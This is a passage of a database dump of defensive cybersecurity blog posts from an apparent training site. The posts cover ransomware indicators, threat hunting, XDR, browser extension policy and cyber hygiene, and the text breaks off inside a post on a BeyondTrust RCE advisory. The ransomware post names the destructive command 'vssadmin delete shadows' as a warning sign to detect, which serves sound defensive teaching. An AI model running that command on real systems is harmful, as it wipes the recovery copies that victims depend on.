Ransomware often executes itself as a process to perform actions such as scanning files, encrypting data, or communicating with external servers.\n\nMonitoring for suspicious or unrecognized processes and services is critical in detecting ransomware operations. Key red flags include:\n\n- Processes consuming unusually high CPU or memory.\n- Services attempting to access large numbers of files rapidly.\n- Processes with unusual names that don’t align with legitimate applications.\n\n**Example:**  \nA process named \"XYZupdate.exe\" running unexpectedly may trigger suspicion. Further analysis might reveal its true intent, such as encrypting local files.\n\n## 3. Unusual Network Connections\n\nRansomware often communicates with external control servers, commonly referred to as command-and-control (C2) servers. These communications are used to transmit instructions to the malicious software, exfiltrate data, or send ransom demands back to the attackers.\n\nBy carefully monitoring network traffic and connections, organizations can identify and block potential ransomware communications. Look out for:\n\n- Unusual outbound traffic patterns.\n- Connections to suspicious or unverified IPs or domains.\n- The use of uncommon network protocols or high numbers of outbound requests.\n\n**Example:**  \nIf an endpoint suddenly connects to an unfamiliar IP address in a foreign country and begins transferring encrypted data, it could indicate ransomware activity.\n\n## 4. Modified or New Registry Keys\n\nRansomware often modifies or creates new registry keys to ensure persistence on a compromised endpoint. 
Registry keys are integral to the operation of Windows systems, and malicious software may exploit them to:\n\n- Automatically execute upon system startup.\n- Run hidden processes.\n- Maintain access after other malware components have been removed.\n\nMonitoring registry changes provides an important layer of visibility into potentially malicious behavior.\n\n**Example:**  \nA new value in an autostart location such as `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` (or its `HKEY_LOCAL_MACHINE` and `RunOnce` counterparts) pointing to an unknown program, or the creation of a registry key under `HKEY_CURRENT_USER\\Software\\RandomName` to launch one, could warrant further investigation. Legitimate installers write to these locations too, so compare against a known-good baseline rather than alerting on every change.\n\n## 5. Unusual File Extensions\n\nMany ransomware variants add specific or unique file extensions to the original filenames they encrypt. These extensions are often clear indicators that a system has been compromised. For instance, if a file named `example.docx` is suddenly renamed to `example.docx.locked` or `example.docx.encrypted`, this is a strong indicator of a ransomware attack in progress. Because renamed files appear only once encryption is already underway, treat the extension as confirmation rather than early warning; pre-encryption behaviors such as deleting Volume Shadow Copies (`vssadmin delete shadows`) or a single process renaming files across many directories at high speed give you more time to respond.\n\nThese file extensions can serve as IoCs for identifying which ransomware strain is responsible for the attack. Security teams can look up these extensions in threat intelligence databases to confirm the ransomware type and determine a tailored response strategy.\n\n**Example:**  \nIf most files on an endpoint are found with extensions like `.darkweb` or `.paycrypt`, it identifies the nature of the infection and implies a ransomware attack specific to that strain.\n\n## Important Notes on IoCs\n\nIt’s essential to recognize that no IoC is one-size-fits-all. The specific IoCs for ransomware can vary based on:\n\n1. The type of ransomware deployed (e.g., WannaCry, LockBit, or DarkSide).\n2. The method of delivery (e.g., phishing emails, exploit kits, or remote access tools).\n\nTherefore, monitoring must be adaptive and integrated with up-to-date threat intelligence. 
Combining IoCs with behavior-based detection and proactive monitoring creates a robust defense against ransomware attacks.\n\n## Final Thoughts\n\nRansomware is a constantly evolving threat, but by closely monitoring Indicators of Compromise, organizations can increase their chances of detecting and responding to ransomware attacks before significant damage occurs. From analyzing file hashes to identifying suspicious processes, understanding these IoCs equips cybersecurity teams with the tools needed to protect systems, data, and workflows.\n\nIf your organization is looking to strengthen its ransomware defense, consider adopting advanced security solutions tailored to monitor these IoCs and provide real-time alerts. Early detection could be the difference between a minor security incident and a costly data breach.', '', 'http://infoseclabs.io/uploads/1773164194431-815349590.jpg', 'Endpoint security analysis for ransomware detection', 1, 'published', '2026-03-08 11:49:00', '2026-03-10 20:36:59', 'Information Security', 'Detecting Ransomware IoCs on Endpoints', 'Learn key IoCs for identifying ransomware on endpoints to enhance security and respond swiftly to threats.', 'Ransomware IoCs'),
(149, 'The Certificate Trap: Why 2026’s Cyber Threats Demand More Than Paper Skills', 'the-certificate-trap-why-2026-s-cyber-threats-demand-more-than-paper-skills', '# Welcome to 2026: The Age of Advanced Cyber Threats\n\nWe are in an era where AI-driven autonomous attacks can cripple systems in seconds, and polymorphic ransomware is stealthier than ever. Yet, thousands of aspiring cybersecurity professionals are still operating with a mindset from a decade ago: \"Get the certificate first, learn the job later.\"\n\nThis approach is broken.\n\nToday’s CISOs and SOC managers are less interested in the framed acronyms on your wall and more interested in what you can do behind a keyboard when the pressure is on. Theoretical knowledge is foundational, but \"digital muscle memory\" is what ensures survival on the defensive line.\n\n## Why Theory No Longer Suffices: The 2026 Perspective\n\nA cybersecurity textbook will tell you what a SIEM (Security Information and Event Management) tool is. It will not teach you what to do at 11:00 PM on a Friday when that tool is screaming with thousands of false positives, hiding one true indicator of compromise (IoC).\n\nThreat actors in 2026 are using machine learning to bypass static defenses. To defend against them, you cannot just \"know\"; you must be able to \"think\" like an attacker and wield your defensive tools like instruments. This capability cannot be read; it must be earned through practice, failure, and repetition in a safe environment.\n\n## Building Defensive \"Muscle Memory\"\n\nPilots don’t learn to fly just by reading manuals; they log hundreds of hours in simulators. Surgeons don\'t learn to operate just by watching videos; they practice.\n\nFor Blue Team professionals, it should be no different. 
Engaging with real-world scenarios on platforms like InfoSecLabs provides:\n\n- **Real-Time Pressure Management**: Learn to prioritize and act when the clock is ticking during a simulated breach.\n- **Tool Proficiency**: Gain hands-on experience configuring and utilizing industry-standard stacks (like Wazuh, ELK, or Velociraptor) with live data, not just static screenshots.\n- **Analytical Mindset Development**: Move beyond memorizing answers to analyzing data to answer the question, \"Why is this log entry anomalous?\"\n\n## Employers Are Saying: \"Show Me\"\n\nHiring processes have shifted radically. The interview question has changed from \"List the OSI layers\" to \"Walk me through how you analyzed and contained that novel Emotet variant last week.\"\n\nHaving \"Certified XYZ\" on your resume is good. Having a portfolio that says, \"I completed the \'Advanced Persistence Threat Detection\' lab on InfoSecLabs and broke the kill chain using these steps...\" sets you apart from 500 other applicants. This is your proven practical experience.\n\n## Time to Take the Wheel\n\nCertifications are valuable; they teach you the rules of the road. But driving in heavy traffic is an entirely different skill set. If you want to be a sought-after SOC analyst or cyber defense expert in 2026, you must step out of the theoretical world and into the practical one.\n\nGet behind the keyboard, spin up the VMs, and get your hands (virtually) dirty. Because the attackers never stop practicing.\n\n👉 Ready to prove your skills? Start your first real-world defensive engagement today with InfoSecLabs.io\'s free introductory scenarios. Don\'t just read about defense—do it.', '', 'http://infoseclabs.io/uploads/1770129692543-2358057.jpeg', NULL, 1, 'published', '2026-02-02 17:38:00', '2026-02-03 17:58:51', 'Information Security', 'Cybersecurity Career 2026: Hands-on Labs vs. 
Certifications', 'Hands-on cybersecurity training, SOC analyst skills 2026, practical InfoSec labs, Blue Team experience, cybersecurity certifications vs reality.', NULL),
(150, 'Detecting the Invisible: Hunting for AI-Enhanced Data Exfiltration in 2026', 'detecting-the-invisible-hunting-for-ai-enhanced-data-exfiltration-in-2026', '# The Evolution of Data Exfiltration: Detecting the Undetectable\n\nIn the early 2020s, data exfiltration was often noisy. Attackers would transmit gigabytes of data over common ports, triggering high-severity alerts in almost any decent Security Information and Event Management (SIEM) system.\n\nFast forward to 2026, and the game has changed. Today’s sophisticated threat actors are using AI-driven obfuscation to mimic your network’s \"heartbeat.\" They don\'t blast data anymore; they drip it out, bit by bit, disguised as legitimate Zoom traffic, cloud syncs, or even encrypted telemetry.\n\n## Catching the Invisible Thief\n\nAs a Blue Teamer, how do you catch a thief that looks exactly like a regular employee?\n\n### The Shift from Signatures to Behavior\n\nTraditional signature-based detection is ineffective for this type of attack. If the traffic looks like a standard HTTPS request to a known cloud provider, your firewall will allow it to pass.\n\nThe 2026 Security Operations Center (SOC) Analyst must rely on Behavioral Baseline Analysis. You aren\'t looking for \"evil\" strings anymore; you are looking for mathematical anomalies:\n\n- **The \"Long Tail\" Connection:** A single connection that stays open for 72 hours, transferring only 5KB every 10 minutes.\n- **Protocol Mismatch:** Traffic on Port 443 that doesn\'t follow the TLS handshake patterns expected from a browser.\n- **Geographic Deviations:** Data flowing to a CDN node that your company’s infrastructure has never interacted with before.\n\n### The \"Low and Slow\" AI Trick\n\nModern malware now uses local AI agents to analyze your network traffic before it even begins the exfiltration process. It \"learns\" when your peak hours are and hides its activity during those bursts. 
To catch this, you need to examine temporal patterns.\n\n## Practical Hunting Steps: Network Flow Analysis\n\nIf you suspect exfiltration, your first stop isn\'t the alerts—it\'s the raw Flow Logs.\n\n- **Filter by Duration:** Look for the longest-running connections.\n- **Analyze Entropy:** Flow logs carry no payload, so this step needs packet capture or Zeek’s extracted files. Encrypted payloads are high-entropy, but so are ordinary compressed files and normal TLS, so entropy alone does not separate exfiltration from legitimate traffic; the signal is high-entropy data on a channel that should carry structured plaintext (DNS labels, HTTP query strings, ICMP payloads) or a sustained outbound volume that doesn’t match the application’s usual profile.\n- **Check Beaconing:** Use tools like Zeek or RITA to find rhythmic heartbeats that suggest an automated exfiltration script.\n\n## The Importance of Practice\n\nYou cannot learn to spot these subtle \"glitches in the matrix\" by reading a manual. You need to experience what \"normal\" looks like in a complex environment to recognize \"abnormal.\"\n\nAt InfoSecLabs.io, we’ve built scenarios that simulate these exact AI-driven exfiltration techniques. We provide you with the SIEM, the logs, and a compromised network. Your job is to find that one red thread in a sea of green.\n\n\nThe \"Invisible\" is only invisible if you aren\'t looking at the right patterns. In 2026, the best defense is a proactive hunter who understands that the most dangerous threats are the ones that look the most normal.\n\n👉 **Challenge Yourself:** Can you spot the leak? Dive into our SOC Lab on InfoSecLabs.io and put your hunting skills to the test.', '', 'http://infoseclabs.io/uploads/1770130588421-387627537.jpg', 'A network analyst detecting AI-driven data exfiltration in 2026', 1, 'published', '2026-02-03 09:52:00', '2026-02-03 17:57:36', 'Information Security', 'AI-Driven Threat Hunting: Detecting Stealthy Data Exfiltration', 'Discover advanced methods to detect AI-driven data exfiltration in 2026. Learn behavioral analysis and hunting techniques.', 'AI threat hunting, data exfiltration detection, SOC analyst 2026, behavioral analysis, network forensics, InfoSecLabs scenarios.'),
(151, 'Beyond the Dashboard: Mastering XDR for Proactive Threat Hunting in 2026', 'beyond-the-dashboard-mastering-xdr-for-proactive-threat-hunting-in-2026', '# The Evolution of Endpoint Security: Embracing XDR in 2026\n\nRemember the days when \"endpoint security\" simply meant installing an antivirus and hoping for the best? Those days are long gone. In 2026, the endpoint has become the new perimeter, and Extended Detection and Response (XDR) is the primary weapon in a SOC analyst\'s arsenal.\n\n## The Problem with Reactive Defense\n\nHowever, there\'s a problem. Too many analysts treat their expensive XDR platforms like glorified alert dashboards. They wait for a red light to flash, then react.\n\nIn a threat landscape dominated by living-off-the-land binaries (LOLBins) and fileless malware, reactive defense is a failing strategy. To be an effective Blue Teamer in 2026, you must stop merely watching your XDR and start driving it.\n\n## XDR: A Search Engine, Not Just an Alarm Bell\n\nThe true power of a modern XDR platform lies in its ability to query the real-time state of your entire fleet. Instead of waiting for an alert about a suspicious PowerShell script, a proactive hunter asks questions:\n\n- \"Show me all endpoints where powershell.exe was launched by winword.exe in the last 24 hours.\"\n- \"List all processes that have established a network connection to a non-standard port over the past hour.\"\n- \"Which user accounts have logged into more than five different hosts in under ten minutes?\"\n\nThese aren\'t alerts; they are hypotheses. Testing hypotheses is the core of threat hunting.\n\n## The \"R\" in XDR: Overcoming the Fear of Response\n\nThe most underutilized feature in many SOCs is the \"Live Response\" capability. 
The ability to remote into a compromised host, kill a malicious process, delete a registry key, or isolate the machine from the network with a single click is incredibly powerful—and terrifying for a junior analyst.\n\nWhat if you isolate the CEO\'s laptop by mistake during a critical meeting? This fear can paralyze action. The only way to overcome it is through practice in a consequence-free environment. You need to know exactly what happens when you push that \"Isolate Host\" button before you have to do it for real.\n\n## Integration is Everything\n\nIn 2026, XDR doesn\'t exist in a vacuum. It feeds your SIEM with high-fidelity data and receives automated response actions from your SOAR playbook. Understanding this ecosystem—how a signal from an endpoint can automatically trigger a firewall block at the network edge—is what separates a tool operator from a true security engineer.\n\n## Get Your Hands on the Controls\n\nReading about XDR capabilities in a whitepaper won\'t prepare you for a real-world ransomware outbreak moving laterally through your network. You need muscle memory. You need to know how to craft queries under pressure and execute response actions without hesitation.\n\nAt InfoSecLabs.io, we provide simulated enterprise environments equipped with modern XDR capabilities. Don\'t just look at the dashboard—take control of it.\n\n👉 Ready to Hunt? Step away from passive monitoring and dive into our \"XDR Hunter\" scenarios on InfoSecLabs.io today.', '', 'http://infoseclabs.io/uploads/1770259238252-359151907.jpg', NULL, 1, 'published', '2026-02-04 21:36:00', '2026-02-05 05:40:42', 'Information Security', 'Mastering XDR in 2026: Proactive Threat Hunting for SOC Analysts', NULL, 'XDR threat hunting, SOC analyst tools 2026, EDR vs XDR, proactive defense, live response, endpoint security labs.'),
(152, 'The Trojan Horse in Your Browser: A Comprehensive Guide to Managing Browser Extensions', 'the-trojan-horse-in-your-browser-a-comprehensive-guide-to-managing-browser-extensions', '# The Browser as the New Operating System\n\nIn 2026, the web browser is no longer just an application; it is the primary operating system for the modern enterprise. Almost every critical business function—from CRM and ERP to communication and code repositories—happens inside a browser tab. This shift has elevated humble browser extensions from simple convenience tools to powerful software with near-omnipresent access to your corporate data.\n\nAn extension that can \"read and change all your data on the websites you visit\" has the same level of access as a keylogger sitting on a terminal displaying sensitive customer PII. While many extensions boost productivity, others are silent data siphons, malware delivery mechanisms, or ticking supply-chain time bombs.\n\nFor the Blue Team, ignoring browser extensions is akin to leaving the front door wide open while securing the windows. This guide covers the risks, strategies, and toolkit needed to regain control of the corporate browser environment.\n\n## The Threat Landscape: Why \"Innocent\" Extensions Are Dangerous\n\nThe core problem is permission creep. To function, even legitimate extensions often require broad permissions that can be abused.\n\n### Data Exfiltration & Spyware\n\nA \"price tracker\" extension has legitimate reasons to read page content. However, a malicious version can just as easily scrape credentials from login forms, session tokens from cookies, or proprietary data displayed on an internal dashboard and send it to a C2 server.\n\n### The AI Assistant Risk (2026 Trend)\n\nThe explosion of \"AI writing assistants\" that live in the browser means employees are voluntarily granting third-party tools access to read everything they type and view—including confidential emails and strategic documents. 
Where does that data go for \"processing\"?\n\n### Supply Chain Attacks\n\nA developer builds a popular, legitimate extension and then sells it to a third party. The new owner pushes a malicious update—perhaps a cryptominer or adware—automatically infecting thousands of corporate endpoints overnight.\n\n### Malvertising & Browser Hijacking\n\nExtensions that inject unwanted ads, redirect search traffic, or modify web pages to phish for credentials.\n\n## The Strategy: A Framework for Control\n\nYou cannot simply block all extensions without causing a user revolt, nor can you allow a free-for-all. A mature organization needs a three-step approach:\n\n### Phase 1: Discovery (Visibility)\n\nYou can\'t protect what you can\'t see. You need to know exactly what extensions are installed across your entire fleet, down to the version number and the permissions they request.\n\n### Phase 2: Assessment (Risk Scoring)\n\nNot all extensions are equal. You must evaluate them based on:\n\n- **Permissions**: Does a color-picker need access to your clipboard and history? (Red flag).\n- **Developer Reputation**: Is it from a known vendor (e.g., Adobe, Okta) or an anonymous developer with a Gmail address?\n- **Update Frequency & Privacy Policy**: When was it last updated? Does it have a clear data handling policy?\n\n### Phase 3: Enforcement (Policy)\n\nImplement a tiered policy structure:\n\n- **Force-Install**: Mandatory security or productivity tools (e.g., password managers, ZTNA agents).\n- **Allowlist**: Pre-approved, vetted extensions that users can install freely.\n- **Blocklist**: Known malicious or high-risk extensions that are banned.\n- **Block All by Default**: The most secure posture, requiring users to request approval for any new extension.\n\n## The Toolkit: How to Implement Control\n\nIn 2026, managing extensions is done via centralized management platforms, not manual checks.\n\n### 1. 
The Foundation: MDM and UEM Platforms\n\nTools like Microsoft Intune, Jamf Pro, or Kandji are the primary enforcement mechanisms. They push configuration profiles to endpoints (Windows, macOS, Linux) that manage the browsers at an OS level.\n\n### 2. Browser-Native Management (Chrome & Edge)\n\nGoogle and Microsoft provide powerful cloud-based controls that integrate with your MDM.\n\n- **Chrome Enterprise Core**: Allows you to set policies for Chrome browsers on managed devices. You can define allow/block lists by extension ID, block extensions that request specific high-risk permissions (like audio capture), and force-install required apps. Note that an allowlist keyed by extension ID still trusts every future update of that extension, so the supply-chain case above (ownership transfer followed by a malicious update) is only caught if you also review permission changes on update or pin approved versions.\n- **Microsoft Edge for Business**: Offers similar granular controls via Intune administrative templates, allowing you to manage add-ons and side-loading policies.\n\n### 3. Specialized Browser Security Platforms (BSP)\n\nFor high-security environments, standard policies might not be enough. Emerging Browser Security Platforms (like Island, Talon, or enterprise-grade extensions like Spin.ai) offer deeper visibility. They can perform behavioral analysis on extensions in real-time, blocking data exfiltration attempts even if the extension itself isn\'t on a blocklist.\n\n## Closing the Gap\n\nSecuring the browser is no longer optional. A single malicious extension on a privileged user\'s machine does not need to defeat firewalls, MFA, or VPNs: it runs inside the already-authenticated browser session, so it can read and exfiltrate whatever the user is authorized to see, including the session cookies and tokens that let an attacker reuse that access from elsewhere.\n\nThe Blue Team must take ownership of this attack surface. 
Start with visibility, move to policy definition, and use the robust enterprise tools available in 2026 to enforce a secure, productive browser environment.', '', 'http://infoseclabs.io/uploads/1771168011010-6738851.jpg', NULL, 1, 'published', '2026-02-15 02:02:00', '2026-02-15 18:11:52', 'Information Security', 'Corporate Browser Extension Security: Risks, Tools, and Management Strategies for 2026', 'Browser extension security, corporate browser management, malicious extensions, data exfiltration risks, Chrome Enterprise policies, MDM browser control, InfoSecLabs.', 'Browser extension security, corporate browser management, malicious extensions, data exfiltration risks, Chrome Enterprise policies, MDM browser control, InfoSecLabs.');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(153, 'Mastering Cyber Hygiene: Essential Steps for Top-Notch Online Security', 'Mastering-Cyber-Hygiene-Essential-Steps', '# Mastering Cyber Hygiene: Essential Steps to Enhance Your Online Security\n\nIn today\'s digital world, maintaining strong cyber hygiene is as crucial as taking care of your personal health. Just as you wouldn\'t leave your home unlocked, your online presence requires the same level of attention and protection. But what does \"cyber hygiene\" really mean, and why is it so critical to your online safety? In this article, we’ll explore both the basics and technical aspects of cyber hygiene, as well as how neglecting it can leave you vulnerable to cyber threats.\n\n## What Is Cyber Hygiene?\n\nCyber hygiene refers to the regular practices and behaviors designed to keep your online presence and systems secure. Think of it like brushing your teeth every day: if you neglect it, you’re bound to face bigger issues down the line. In the world of cybersecurity, cyber hygiene encompasses activities like managing passwords, updating software, and being cautious of suspicious activities.\n\n### The Simple Breakdown\n\nImagine this scenario: you never update your devices, use weak passwords across multiple sites, and open every email link without thinking twice. 
These common poor habits can lead to a host of cybersecurity problems, such as malware infections, data breaches, and identity theft.\n\n### A More Technical Look\n\nFrom a technical standpoint, cyber hygiene practices include:\n\n- **Regular Software Updates**: Installing the latest patches to fix vulnerabilities.\n- **Strong, Unique Passwords**: Using complex, different passwords for every login.\n- **Multi-Factor Authentication (MFA)**: Adding an extra layer of protection by requiring more than just a password.\n- **Phishing Awareness**: Recognizing suspicious emails and links to avoid malware.\n\nBy adhering to these practices, you can significantly reduce your risk of becoming a target of cyber-attacks.\n\n## Why Poor Cyber Hygiene Increases Cybersecurity Risks\n\nNeglecting cyber hygiene creates vulnerabilities in your system, offering attackers an opportunity to exploit weaknesses. Let’s dive deeper into how this happens:\n\n### Common Vulnerabilities\n\nOutdated software is a prime target for attackers. Once known vulnerabilities in the software are left unpatched, attackers can exploit these flaws to gain access to your system. These vulnerabilities, often cataloged in databases, become common entry points for malicious actors.\n\n### Delivering Malicious Payloads\n\nOnce vulnerabilities are identified, attackers can deliver malicious payloads—such as ransomware or spyware—to your device. These payloads often run without your knowledge, quietly infecting your system and compromising your data.\n\n### Command and Control (C2) Systems\n\nWhen a system is successfully compromised, attackers can establish a Command and Control (C2) connection, allowing them to remotely control the infected device. 
From here, they can steal sensitive data, deploy further malware, or even hold your information for ransom.\n\n## 🛡️ SOC Analysts: A Look at How to Detect Threats\n\nAs a Security Operations Center (SOC) analyst, your job is to monitor and defend your network from these types of threats. If you\'re working with a Security Information and Event Management (SIEM) system, here’s how you can identify suspicious activity:\n\n### Triage\n\n- **Validate Alerts**: Verify whether the suspicious activity aligns with known attack patterns.\n- **Correlate Data**: Analyze related logs to look for trends that could indicate a larger breach.\n\n### Containment\n\n- **Isolate Affected Systems**: Disconnect compromised devices from the network to prevent further damage—prefer EDR network isolation over powering the host off, so that volatile evidence (memory, running processes, open connections) is preserved for the investigation.\n- **Apply Security Patches**: Patch the vulnerabilities that were exploited, but only after evidence has been captured. Patching closes the entry point; it does not evict an attacker who already established persistence or stole credentials, so eradication (removing persistence, rotating credentials, or rebuilding the host) still has to follow.\n\n## 🎓 Student Corner: Key Cybersecurity Terms\n\n### Phishing\n\nPhishing refers to fraudulent emails or messages that seem to come from trustworthy sources but are designed to steal sensitive information, such as passwords or credit card details.\n\n### Multi-Factor Authentication (MFA)\n\nMFA is a security mechanism that requires users to provide more than one form of verification before granting access to an account or system. This adds a crucial layer of protection beyond just a password. Not all factors are equal: SMS codes and push approvals can be relayed or fatigued by phishing kits, whereas FIDO2/passkey authenticators are bound to the site origin and resist that class of attack.\n\n## How Cyber Hygiene Impacts Your Career\n\nWhether you\'re just starting in cybersecurity or looking to advance, strong cyber hygiene is the foundation for protecting both personal and professional data. Implementing and mastering these best practices will also help you stand out as a knowledgeable candidate for cybersecurity roles.\n\n## 🚀 Take Action Now: Test Your Cybersecurity Skills\n\nReady to put your knowledge into practice? Try fighting real-world attacks in our VirtualSOC simulator. 
Sign up now to investigate alerts, practice incident response, and hone your cyber defense skills in a realistic environment.\n\n## MITRE ATT&CK Framework: Mapping the Threat\n\n- **Tactic**: Initial Access (TA0001)\n- **Technique**: Phishing (T1566)\n\nBy practicing good cyber hygiene and staying vigilant about your online security, you can better protect your personal and organizational data. Remember, when it comes to cybersecurity, prevention is always better than cure. Start applying these techniques today to safeguard your digital life!', 'Explore the fundamentals of cyber hygiene with a deep dive into recent online safety incidents, their technical analysis, and practical actions for SOC analysts and cybersecurity students.', 'http://infoseclabs.io/uploads/1771257235499-682019872.jpg', NULL, 1, 'published', '2026-02-16 02:42:00', '2026-02-16 18:59:14', 'Information Security', 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'Explore the fundamentals of cyber hygiene with a deep dive into recent online safety incidents, their technical analysis, and practical actions for SOC analysts and cybersecurity students.', 'The Basics of Cyber Hygiene: How to Stay Safe Online'),
(154, 'Navigating Cyber Threats: How to Detect Infection on Your Machine', 'how-can-i-determine-if-computer-is-infected', '# Cybersecurity Threats: Recognizing and Responding to Computer Infections\n\nCybersecurity threats are more prevalent than ever, making it crucial for individuals—especially students and learners in the field of cybersecurity—to identify when their computer may be compromised. Knowing the signs of a computer infection and how to respond is an essential skill for maintaining personal and professional security. This guide will help you recognize the symptoms of a potential infection, diagnose issues, and take steps to safeguard your system.\n\n## Why Detecting Computer Infections is Critical\n\nA compromised computer can do more than just slow down your day. It can expose sensitive information, allow hackers to access your accounts, and spread malware to others in your network. Early detection is key to minimizing damage and maintaining a secure system.\n\n## Common Signs of Computer Infections\n\nNot all computer infections are obvious, but there are some red flags to look out for:\n\n### 1. Unusual Computer Behavior\n\nStrange actions like random restarts, unauthorized software installations, or unexpected updates could indicate malicious activity. If your computer isn’t functioning as it normally does, it could be infected.\n\n### 2. Sluggish Performance\n\nIf your computer suddenly becomes slow, freezes, or crashes frequently, it could be due to malware running in the background. Performance issues often suggest that something unauthorized is consuming your device\'s resources.\n\n### 3. Unexpected Pop-ups\n\nPersistent pop-ups, even when you aren’t browsing the web, are a common sign of adware or spyware infections. These often include fake antivirus warnings designed to trick you into downloading more malware.\n\n### 4. 
Changes to Homepage or Browser Settings\n\nIf your internet browser\'s homepage changes without your consent or if you encounter new toolbars or extensions you didn’t install, your system might be compromised. These changes are often caused by browser hijackers.\n\n## How to Diagnose a Computer Infection\n\nOnce you notice unusual behavior, follow these steps to confirm if your computer is infected:\n\n### 1. Use Antivirus Software\n\nRun a deep or full scan using reliable antivirus software. Many antivirus programs can detect and isolate harmful files, offering a solid first line of defense.\n\n### 2. Scan for Malware\n\nUse dedicated malware scanning programs like Malwarebytes in tandem with your antivirus software. These tools specialize in detecting threats that traditional antivirus programs might miss.\n\n### 3. Check for Unwanted Programs\n\nAccess your list of installed programs and look for anything unfamiliar. If you spot apps you didn’t download, especially those with strange names, uninstall them after verifying their legitimacy.\n\n## Preventative Measures to Avoid Future Infections\n\nPreventing infections is far easier than dealing with the aftermath. Here are some best practices for avoiding malware:\n\n### 1. Keep Software Updated\n\nEnsure your operating system, antivirus software, and all applications are regularly updated. Security vulnerabilities are often patched in updates, making your system less susceptible to attacks.\n\n### 2. Be Cautious with Downloads and Links\n\nOnly download files from trusted sources and avoid clicking on suspicious links in emails or online ads. Cybercriminals often disguise malware in links or attachments.\n\n### 3. Use Strong Passwords and Two-Factor Authentication\n\nImplement strong, unique passwords for your accounts and enable two-factor authentication (2FA) wherever possible. 
This adds an extra layer of security to your system and data.\n\n## What to Do If Your Computer is Infected\n\nIf your diagnostics confirm an infection, take the following steps immediately:\n\n### 1. Quarantine and Remove Malware\n\nUse your antivirus or malware removal tools to quarantine and delete infected files. Ensure the entire system is scanned to address all threats. If you cannot be confident that everything was removed—or the infection involved a rootkit, ransomware, or a remote-access tool—back up your data and reinstall the operating system from trusted media rather than trusting a \"cleaned\" system. On a company-managed device, do not start cleaning on your own: disconnect it, leave it powered on, and report it to your security team so evidence is preserved.\n\n### 2. Change Passwords\n\nAfter removing the malware, change the passwords for all your accounts, especially if any personal data was exposed during the infection. Do this from a known-clean device, not the one that was infected, and also sign out of all active sessions and revoke saved tokens or app passwords—an infostealer may have taken session cookies that remain valid even after the password changes.\n\n### 3. Alert Others If Necessary\n\nIf the infection might have spread through shared networks or email links, inform other users or affected contacts so they can check their systems too.\n\n## Organizational Cybersecurity Tools for Detecting Anomalies\n\nWhen a device is part of an organization, advanced cybersecurity tools can play a vital role in identifying and alerting anomalies. Here are some key tools commonly used:\n\n1. **Intrusion Detection and Prevention Systems (IDPS)**  \n   These tools monitor network traffic for malicious activities and can alert administrators to unusual behavior, such as unauthorized access attempts or abnormal data transfers.\n\n2. **Endpoint Detection and Response (EDR)**  \n   EDR solutions provide real-time monitoring of endpoints (devices) within the organization. They help detect threats, isolate affected devices, and provide detailed forensic analysis of the incident.\n\n3. **Security Information and Event Management (SIEM)**  \n   SIEM tools consolidate logs and event data from multiple sources, analyze them for suspicious patterns, and generate alerts for potential security breaches or anomalies.\n\n4. **Network Traffic Analysis (NTA) Tools**  \n   These tools analyze network activity to detect unusual patterns, such as spikes in data usage or communications with known malicious servers, helping prevent data exfiltration or attacks.\n\n5. 
**Email Security Solutions**  \n   Many organizations deploy email security tools that detect phishing attempts, suspicious attachments, and email accounts compromised by malware.\n\n6. **User and Entity Behavior Analytics (UEBA)**  \n   UEBA tools use advanced algorithms to establish a baseline of normal behavior for users and systems. They can then detect deviations, such as irregular login times or accessing unexpected data, and trigger alerts.\n\nUsing these tools, organizations can minimize the risk of undetected infections, respond promptly to security incidents, and ensure the safety of their networked infrastructure. Additionally, regular updates and patching of software and systems are crucial in preventing cyber attacks. Organizations should also educate their employees on best practices for cybersecurity, such as creating strong passwords, being cautious of suspicious emails or links, and regularly backing up important data.\n\nBy implementing a combination of these measures, organizations can significantly improve their overall cybersecurity posture and protect against potential threats. While technology plays a critical role in defending against cyber attacks, it is important to remember that it is only one piece of the puzzle. A comprehensive approach that includes both technological solutions and employee awareness and training is essential in safeguarding an organization\'s valuable information and assets.\n\n## Final Thoughts\n\nCybersecurity is a shared responsibility, and knowing how to detect and address computer infections is crucial for every individual. Staying vigilant, proactive, and informed can save you from potential risks and data loss. Need more cybersecurity tips and tricks? 
Always stay updated on the latest threats and defenses in the digital world—because being aware is the first step toward being secure.', 'Expert analysis on detecting computer infections, focusing on recent cybersecurity events involving sophisticated malware like Emotet. Learn to identify and respond to threats effectively.', 'http://infoseclabs.io/uploads/1771258399806-134594668.jpg', NULL, 1, 'published', '2026-02-14 19:01:00', '2026-02-16 19:13:27', 'Information Security', 'How can I determine if my computer is infected?', 'Expert analysis on detecting computer infections, focusing on recent cybersecurity events involving sophisticated malware like Emotet. Learn to identify and respond to threats effectively.', 'How can I determine if my computer is infected?'),
(155, 'CISA: BeyondTrust RCE flaw now exploited in ransomware attacks', 'cisa-beyondtrust-rce-flaw-now-exploited-in-ransomware-attacks', '## Executive Summary\n**The CISA has issued a warning about active exploitation of the CVE-2026-1731 RCE flaw in BeyondTrust Remote Support, now linked to ransomware attacks. This escalation marks a critical threat to network security and demands immediate attention.**\n\n## The Deep Dive (Technical Analysis)\nThe CVE-2026-1731 vulnerability in BeyondTrust\'s Remote Support software has become a significant foothold for cybercriminals, particularly in the orchestration of ransomware campaigns. This Remote Code Execution (RCE) flaw allows an attacker to execute arbitrary code on a victim\'s system without authentication. The exploitation process typically begins with the attacker sending a crafted request to the exposed BeyondTrust interface, which, due to insufficient validation of user-supplied data, processes the request and executes the malicious code.\n\nThis vulnerability is especially perilous due to its ability to give attackers a direct method to deploy payloads, including ransomware, thus bypassing traditional perimeter defenses. The ransomware strains associated with this vulnerability have not been explicitly named, but the attack vectors follow a familiar pattern: exploit, establish persistence, escalate privileges, and deploy ransomware.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **Network Traffic**: Look for unusual outbound traffic, especially to known bad IPs or domains.\n- **Endpoint Logs**: Check for unexpected process executions, particularly from standard system tools.\n- **BeyondTrust Logs**: Monitor for any anomalous activity, such as failed authentication attempts or unusual admin actions.\n\n### Triage Steps\n1. **Isolate**: Immediately isolate affected systems to prevent lateral movement.\n2. 
